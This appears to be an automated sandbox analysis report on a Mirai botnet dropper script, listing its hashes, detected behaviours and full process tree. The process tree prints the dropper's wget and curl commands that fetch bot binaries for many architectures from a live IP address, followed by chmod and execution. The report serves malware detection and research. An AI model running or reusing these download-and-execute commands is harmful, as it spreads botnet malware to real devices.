Analysis
-
max time kernel
29s -
max time network
30s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
15/12/2024, 10:38
Static task
static1
Behavioral task
behavioral1
Sample
Oblivion121.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Oblivion121.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Oblivion121.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
Oblivion121.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
Oblivion121.sh
-
Size
1KB
-
MD5
90e5e43e5d798a41934d7f30e8208b24
-
SHA1
0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7
-
SHA256
09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233
-
SHA512
ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032
Malware Config
Extracted
mirai
MIRAI
Signatures
-
Mirai family
-
Contacts a large (34482) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1519 chmod 1556 chmod 1593 chmod 1604 chmod 1626 chmod 1532 chmod 1543 chmod 1569 chmod 1582 chmod 1615 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/cp 1520 cp /tmp/cp 1533 cp /tmp/cp 1544 cp /tmp/cp 1557 cp /tmp/cp 1570 cp /tmp/cp 1583 cp /tmp/cp 1594 cp /tmp/cp 1605 cp /tmp/cp 1616 cp /tmp/cp 1627 cp -
Modifies Watchdog functionality 1 TTPs 20 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp -
Enumerates active TCP sockets 1 TTPs 10 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads system network configuration 1 TTPs 10 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
description ioc Process File opened for reading /proc/1514/fd cp File opened for reading /proc/1580/fd cp File opened for reading /proc/1276/fd cp File opened for reading /proc/422/fd cp File opened for reading /proc/1187/fd cp File opened for reading /proc/1200/fd cp File opened for reading /proc/562/fd cp File opened for reading /proc/1091/fd cp File opened for reading /proc/1246/fd cp File opened for reading /proc/1172/fd cp File opened for reading /proc/1527/fd cp File opened for reading /proc/456/fd cp File opened for reading /proc/647/fd cp File opened for reading /proc/1610/fd cp File opened for reading /proc/1246/fd cp File opened for reading /proc/422/fd cp File opened for reading /proc/1536/fd cp File opened for reading /proc/523/fd cp File opened for reading /proc/650/fd cp File opened for reading /proc/485/fd cp File opened for reading /proc/1356/fd cp File opened for reading /proc/584/fd cp File opened for reading /proc/1119/fd cp File opened for reading /proc/462/fd cp File opened for reading /proc/1562/fd cp File opened for reading /proc/523/fd cp File opened for reading /proc/1191/fd cp File opened for reading /proc/1314/fd cp File opened for reading /proc/1540/fd cp File opened for reading /proc/1192/fd cp File opened for reading /proc/478/fd cp File opened for reading /proc/1025/fd cp File opened for reading /proc/1288/fd cp File opened for reading /proc/1071/fd cp File opened for reading /proc/1506/fd cp File opened for reading /proc/1063/fd cp File opened for reading /proc/1100/fd cp File opened for reading /proc/414/fd cp File opened for reading /proc/650/fd cp File opened for reading /proc/1071/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/1356/fd cp File opened for reading /proc/964/fd cp File opened for reading /proc/483/fd cp File opened for reading /proc/673/fd cp File opened for reading /proc/1078/fd cp File opened for reading /proc/1192/fd cp File opened for reading /proc/415/fd cp File opened for reading /proc/936/fd cp File opened for reading /proc/976/fd cp File opened for reading /proc/474/fd cp File opened for reading /proc/976/fd cp File opened for reading /proc/1549/fd cp File opened for reading /proc/1044/fd cp File opened for reading /proc/1256/fd cp File opened for reading /proc/684/fd cp File opened for reading /proc/462/fd cp File opened for reading /proc/966/fd cp File opened for reading /proc/1166/fd cp File opened for reading /proc/437/fd cp File opened for reading /proc/954/fd cp File opened for reading /proc/1178/fd cp File opened for reading /proc/326/fd cp File opened for reading /proc/1527/fd cp -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1524 wget 1530 curl 1533 cp -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IGz.x86 wget File opened for modification /tmp/IGz.mpsl wget File opened for modification /tmp/IGz.sh4 wget File opened for modification /tmp/IGz.arm6 curl File opened for modification /tmp/IGz.ppc curl File opened for modification /tmp/IGz.x86 curl File opened for modification /tmp/cp Oblivion121.sh File opened for modification /tmp/IGz.mips wget File opened for modification /tmp/IGz.arm4 curl File opened for modification /tmp/IGz.arm5 wget File opened for modification /tmp/IGz.arm6 wget File opened for modification /tmp/IGz.arm5 curl File opened for modification /tmp/IGz.arm7 wget File opened for modification /tmp/IGz.arm7 curl File opened for modification /tmp/IGz.sh4 curl File opened for modification /tmp/IGz.mips curl File opened for modification /tmp/IGz.mpsl curl File opened for modification /tmp/IGz.ppc wget File opened for modification /tmp/IGz.m68k wget File opened for modification /tmp/IGz.m68k curl
Processes
-
/tmp/Oblivion121.sh/tmp/Oblivion121.sh1⤵
- Writes file to tmp directory
PID:1512 -
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.x862⤵
- Writes file to tmp directory
PID:1513
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.x862⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/catcat IGz.x862⤵PID:1518
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/cp./cp x862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1520
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1524
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.mips IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/cp./cp mips2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:1533
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.mpsl2⤵
- Writes file to tmp directory
PID:1537
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.mpsl2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/cp./cp mpsl2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1544
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm42⤵PID:1548
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm42⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/cp./cp arm42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1557
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm52⤵
- Writes file to tmp directory
PID:1561
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm52⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/cp./cp arm52⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1570
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm62⤵
- Writes file to tmp directory
PID:1574
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm62⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/cp./cp arm62⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1583
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm72⤵
- Writes file to tmp directory
PID:1587
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm72⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/cp./cp arm72⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1594
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.ppc2⤵
- Writes file to tmp directory
PID:1598
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.ppc2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.ppc IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/cp./cp ppc2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1605
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.m68k2⤵
- Writes file to tmp directory
PID:1609
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.m68k2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/cp./cp m68k2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1616
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.sh42⤵
- Writes file to tmp directory
PID:1620
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.sh42⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/chmodchmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.sh4 IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/cp./cp sh42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1627
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
72KB
MD5acd283bf65ed831dd470134f403a9294
SHA13c0f8231e8089430e32ef8daea73597170a2b4c0
SHA2568d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67
SHA5120847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72